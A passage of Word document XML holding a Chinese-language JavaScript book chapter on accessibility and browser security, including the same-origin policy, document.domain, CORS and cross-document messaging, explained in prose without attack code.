        <w:t>来呈现数据的话，就会把那些使用读屏软件的用户拒之门外。（当然也会把那些使用像手机这样不支持</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的移动设备的用户以及那些有意禁用浏览器脚本的用户排除在外。）</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的角色应当是增加信息的表现力，而不是负责信息的呈现。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>可访问性的一条重要原则是，设计的代</w:t>
      </w:r>
      <w:r>
        <w:t>码即使在禁</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器的浏览器中也能正常使用（或至少以某种形式正常使用）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可访问性关心的另一个重要的问题是，对于那些只使用键盘但不能（或者选择不用）使用鼠标的用户来说，如果编写的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码依赖于特定的鼠标事件，这就会将那些不使用鼠标的用户排除在外。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器允许使用键盘来遍历和激活一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面中的</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>元素。并且</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码也应该允许这样做。正如第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章所介绍的，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>支持独立于设备的事件，例如</w:t>
      </w:r>
      <w:r>
        <w:t>onfocus</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>，以及依赖于设备的事件</w:t>
      </w:r>
      <w:r>
        <w:t>（比如</w:t>
      </w:r>
      <w:r>
        <w:t>onmouseover</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>onmousedown</w:t>
      </w:r>
      <w:r>
        <w:t>）。为了考虑到可访问性，应该尽可能地支持独立于设备的事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建可访问的</w:t>
      </w:r>
      <w:r>
        <w:t>We b</w:t>
      </w:r>
      <w:r>
        <w:t>页面并非鸡毛蒜皮的小问题，而对于可访问性的完整讨论则超出了本书的范畴。关心可访问性的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用开发者应该阅读这里的文档：</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.w3.org/WAI/intro/aria</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>WAI-ARIA</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>Web Accessibility Initiative-Accessible Rich Internet Applications</w:t>
      </w:r>
      <w:r>
        <w:t>）标准。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="325" w:name="13_6_An_Quan_Xing_"/>
      <w:r>
        <w:t>13.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　安全性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="325"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中包</w:t>
      </w:r>
      <w:r>
        <w:t>含</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器，也就是说，一旦载入</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面，就可以让任意的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码在计算机里执行。很明显，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这里存在着安全隐患，浏览器厂商也在不断地权衡下面这两个方面之间的博弈：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>定义强大的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，启用强大的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>阻止恶意代码读取或修改数据、盗取隐私、诈骗或浪费时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>就像在其他领域中一样，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>也在盘根错节的安全漏洞和补丁之间不断地发展演化。在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>早期，浏览器添加了类似能够打开、移动、调整窗口大小以及编辑浏览器状态栏的功能。而当不道德的广告商和骗子开始滥用这</w:t>
      </w:r>
      <w:r>
        <w:t>些技术，浏览器制作者不得不限制或禁用这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。今天，在标准化</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的进程中，浏览器厂商会小心（并且开放和合作性地）掂量某个长期存在的安全限制，并且在（希望）不引入新的安全漏洞的基础上给客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>添加少量的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面几节会介绍</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的安全限制和安全问题，这些问题是每个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>开发者都需要意识到的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="326" w:name="13_6_1_JavaScriptBu_Neng_Zuo_Shi_Yao_"/>
      <w:r>
        <w:t>13.6.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>不能做什么</w:t>
      </w:r>
      <w:bookmarkEnd w:id="326"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>We b</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器针对恶意代码的第一条防线就是它们不支持某些功能。例如，客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>没有权限来写入或删除客户计算机上</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的任意</w:t>
      </w:r>
      <w:r>
        <w:t>文件或列出任意目录。这意味着</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序不能删除数据或植入病毒。（但</w:t>
      </w:r>
      <w:r>
        <w:t>22.6.5</w:t>
      </w:r>
      <w:r>
        <w:t>节会介绍</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>如何阅读用户选择的文件，</w:t>
      </w:r>
      <w:r>
        <w:t>22.7</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>如何实现安全隐私文件系统，以及如何读取和写入文件。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似地，客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>没有任何通用的网络能力。客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序可以对</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>协议编程（参见第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章）；并且</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>有一个附属标准叫</w:t>
      </w:r>
      <w:r>
        <w:t>WebSockets</w:t>
      </w:r>
      <w:r>
        <w:t>，定义了一个类套接字的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，用于和指定的服务器通信。但是，这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>都不允许对于范围更广的网络进行直</w:t>
      </w:r>
      <w:r>
        <w:t>接访问。通用的</w:t>
      </w:r>
      <w:r>
        <w:t>Internet</w:t>
      </w:r>
      <w:r>
        <w:t>客户端和服务器不能同时使用客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>来写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器针对恶意代码的第二条防线是在自己支持的某些功能上施加限制。以下是一些功能限制：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序可以打开一个新的浏览器窗口，但是为了防止广告商滥用弹出窗口，很多浏览器限制了这一功能，使得只有为了响应鼠标单击这样的用户触发事件的时候，才能使用它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序可以关闭自己打开的浏览器窗口，但是不允许它不经过用户确认就关闭其他的窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">·HTML </w:t>
      </w:r>
      <w:r>
        <w:t>FileUpload</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性是只读的。如果可以设置这个属性，脚本就能设置它为任意期望的文件名，从而导致表单上传指定文件（比如密码文件）的内容到服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>脚本不能读取从不同服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r>
        <w:t>载入的文档的内容，除非这个就是包含该脚本的文档。类似地，一个脚本不能在来自不同服务器的文档上注册事件监听器。这就防止脚本窃取其他页面的用户输入（例如，组成一个密码项的键盘单击过程）。这一限制叫做同源策略（</w:t>
      </w:r>
      <w:r>
        <w:t>same-origin policy</w:t>
      </w:r>
      <w:r>
        <w:t>），下一节将更详细地介绍它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，这里并未给出所有的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScr</w:t>
      </w:r>
      <w:r>
        <w:t>ipt</w:t>
      </w:r>
      <w:r>
        <w:t>的限制项，不同浏览器有不同的安全策略，并可能实现不同的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>限制。部分浏览器可能还允许根据用户偏好来增强或减弱限制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="327" w:name="13_6_2_Tong_Yuan_Ce_Lue_"/>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　同源策略</w:t>
      </w:r>
      <w:bookmarkEnd w:id="327"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>同源策略是对</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码能够操作哪些</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>内容的一条完整的安全限制。当</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面使用多个＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素或者打开其他浏览器窗口的时候，这一策略通常就会发挥作用。在这种情况下，同源策略负责管理窗口或窗体中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码以及和其他窗口或帧的交互。具体来说，脚本只能读取和所属文档来源相同的窗口</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>和文档的属性（参见</w:t>
      </w:r>
      <w:r>
        <w:t>14.8</w:t>
      </w:r>
      <w:r>
        <w:t>节了解如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>Script</w:t>
      </w:r>
      <w:r>
        <w:t>操控多个窗口和窗体）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档的来源包含协议、主机，以及载入文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>端口。从不同</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器载入的文档具有不同的来源。通过同一主机的不同端口载入的文档具有不同的来源。使用</w:t>
      </w:r>
      <w:r>
        <w:t>http:</w:t>
      </w:r>
      <w:r>
        <w:t>协议载入的文档和使用</w:t>
      </w:r>
      <w:r>
        <w:t>https:</w:t>
      </w:r>
      <w:r>
        <w:t>协议载入的文档具有不同的来源，即使它们来自同一个服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>脚本本身的来源和同源策略并不相关，相关的是脚本所嵌入的文档的来源，理解这一点很重要。例如，假设一个来自主机</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>的脚本被包含到（使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标记的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性）宿主</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>的一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面中。这个脚本的来源是主机</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>，并且可以完整地访</w:t>
      </w:r>
      <w:r>
        <w:t>问包含它的文档的内容。如果脚本打开一个新窗口并载入来自主机</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>的另一个文档，脚本对这个文档的内容也具有完全的访问权限。但是，如果脚本打开第三个窗口并载入一个来自主机</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>的文档（或者是来自主机</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>），同源策略就会发挥作用，阻止脚本访问这个文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实际上，同源策略并非应用于不同源的窗口中的所有对象的所有属性。不过它应用到了其中的大多数属性，尤其是对</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的几乎所有属性而言。凡是包含另一个服务器中文档的窗口或窗体，都是同源策略适用的范围。如果脚本打开一个窗口，脚本也可</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>以关闭它，但不能以任何方式查看窗口内部。同源策略还应用于使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>生成的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求（参见第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章）。这个对象允许客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>生成任意的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求到脚本所属文档的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器，但是不允许脚本和其他</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器通信。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于防止脚本窃取似有的</w:t>
      </w:r>
      <w:r>
        <w:t>信息来说，同源策略是必需的。如果没有这一限制，恶意脚本</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>通过防火墙载入到安全的公司内网的浏览器中</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>可能会打开一个空的窗口，欺骗用户进入并使用这个窗口在内网上浏览文件。恶意脚本就能够读取窗口的内容并将其发送回自己的服务器。同源策略防止了这种行为。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不严格的同源策略</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在某些情况下，同源策略就显得太过严格了。本节会介绍三种不严格的同源策略。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>同源策略给那些使用多个子域的大站点带来了一些问题。例如，来自</w:t>
      </w:r>
      <w:r>
        <w:t>home.example.com</w:t>
      </w:r>
      <w:r>
        <w:t>的文档里的脚本想要合法地读取从</w:t>
      </w:r>
      <w:r>
        <w:t>developer.example.com</w:t>
      </w:r>
      <w:r>
        <w:t>载入的文档</w:t>
      </w:r>
      <w:r>
        <w:t>的属性，或者来自</w:t>
      </w:r>
      <w:r>
        <w:t>orders.example.com</w:t>
      </w:r>
      <w:r>
        <w:t>的脚本可能需要读</w:t>
      </w:r>
      <w:r>
        <w:t>catalog.example.com</w:t>
      </w:r>
      <w:r>
        <w:t>上的文档的属性。为了支持这种类型的多域名站点，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:t>属性。在默认情况下，属性</w:t>
      </w:r>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:t>存放的是载入文档的服务器的主机名。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>可以设置这一属性，不过使用的字符串必须具有有效的域前缀或它本身。因此，如果一个</w:t>
      </w:r>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:t>属性的初始值是字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"home.example.com"</w:t>
      </w:r>
      <w:r>
        <w:t>，就可以把它设置为字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"example.com"</w:t>
      </w:r>
      <w:r>
        <w:t>，但是不能设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"home.example"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"am</w:t>
      </w:r>
      <w:r>
        <w:t>ple.com"</w:t>
      </w:r>
      <w:r>
        <w:t>。另外，</w:t>
      </w:r>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:t>值中必须有一个点号，不能把它设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"com"</w:t>
      </w:r>
      <w:r>
        <w:t>或其他顶级域名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果两个窗口（或窗体）包含的脚本把</w:t>
      </w:r>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:t>设置成了相同的值，那么这两个窗口就不再受同源策略的约束，它们可以相互读取对方的属性。例如，从</w:t>
      </w:r>
      <w:r>
        <w:t>order.example.com</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>catalog.example.com</w:t>
      </w:r>
      <w:r>
        <w:t>载入的文档中的脚本可以把它们的</w:t>
      </w:r>
      <w:r>
        <w:t>document.domain</w:t>
      </w:r>
      <w:r>
        <w:t>属性都设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"example.com"</w:t>
      </w:r>
      <w:r>
        <w:t>，这样一来，这些文档就有了同源性，可以互相读取属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不严格的同源策略的第二项技术已经标准化为：跨域资源</w:t>
      </w:r>
      <w:r>
        <w:t>共享（</w:t>
      </w:r>
      <w:r>
        <w:t>Cross-Origin Resource Sharing</w:t>
      </w:r>
      <w:r>
        <w:t>，参见</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.w3.org/TR/cors/</w:t>
      </w:r>
      <w:r>
        <w:t>）。这个标准草案用新的</w:t>
      </w:r>
      <w:r>
        <w:t>"Origin:"</w:t>
      </w:r>
      <w:r>
        <w:t>请求头和新的</w:t>
      </w:r>
      <w:r>
        <w:t>Access-Control-Allow-Origin</w:t>
      </w:r>
      <w:r>
        <w:t>响应头来扩展</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>。它允许服务器用头信息显式地列出源，或使用通配符来匹配所有的源并允许由任何地址请求文件。类似</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 3.5</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Safari 4</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器可以使用这种新的头信息来允许跨域</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求，这样</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>就不会被同源策略所限制了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>另一种新技术，叫做</w:t>
      </w:r>
      <w:r>
        <w:t>跨文档消息（</w:t>
      </w:r>
      <w:r>
        <w:t>cross-document messaging</w:t>
      </w:r>
      <w:r>
        <w:t>），允许来自一个文档的脚本可以传递文本消息到另一个文档里的脚本，而不管脚本的来源是否不同。调用</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上的</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，可以异步传递消息事件（可以用</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
